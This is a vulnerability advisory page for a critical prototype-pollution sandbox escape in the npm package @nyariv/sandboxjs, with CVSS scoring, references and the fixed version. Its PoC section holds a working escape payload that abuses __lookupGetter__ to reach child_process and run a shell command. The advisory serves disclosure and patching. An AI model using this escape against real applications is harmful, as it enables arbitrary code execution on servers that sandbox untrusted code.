GHSA-9p4w-fq8m-2hp7 | Mondoo Vulnerability Intelligence

GHSA-9p4w-fq8m-2hp7

CRITICAL10.0

SandboxJS Vulnerable to Prototype Pollution -> Sandbox Escape -> RCE

Published Feb 2, 2026

Modified 1 months ago

Fix available

Details

Summary

SandboxJS does not properly restrict __lookupGetter__ which can be used to obtain prototypes, which can be used for escaping the sandbox / remote code execution.

Details

https://github.com/nyariv/SandboxJS/blob/f212a38fb5a6d4bc2bc2e2466c0c011ce8d41072/src/executor.ts#L368-L398

The Object prototype which contains __lookupGetter__ is properly protected, but the special case for accessing function properties bypasses the prototype chain checks including the root Object prototype.

PoC

const s = require("@nyariv/sandboxjs").default;
const sb = new s();

payload = `
let getProto = Object.toString.__lookupGetter__("__proto__")
let m = getProto.call(new Map());
m.has = isFinite;

console.log(
  isFinite.constructor(
    "return process.getBuiltinModule('child_process').execSync('ls -lah').toString()",
  )(),
);`
sb.compile(payload)().run();

Impact

Prototype Pollution -> RCE

Affected Packages

@nyariv/sandboxjs

npm

Fixed in:

0.8.27

References

https://github.com/advisories/GHSA-9p4w-fq8m-2hp7

https://github.com/nyariv/SandboxJS

https://github.com/nyariv/SandboxJS/blob/f212a38fb5a6d4bc2bc2e2466c0c011ce8d41072/src/executor.ts#L368-L398

https://github.com/nyariv/SandboxJS/commit/75c8009db32e6829b0ad92ca13bf458178442bd3

https://github.com/nyariv/SandboxJS/security/advisories/GHSA-9p4w-fq8m-2hp7

https://nvd.nist.gov/vuln/detail/CVE-2026-25142

Aliases

CVSS Analysis

CVSS v3.1

10.0

Exploitability

Attack Vector

NetworkAV:N

Attack Complexity

LowAC:L

Privileges Required

NonePR:N

User Interaction

NoneUI:N

Scope

Scope

ChangedS:C

Impact

Confidentiality

HighC:H

Integrity

HighI:H

Availability

HighA:H

10.0/CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Related

Ecosystems

Timeline

PublishedFeb 2, 2026

ModifiedFeb 3, 2026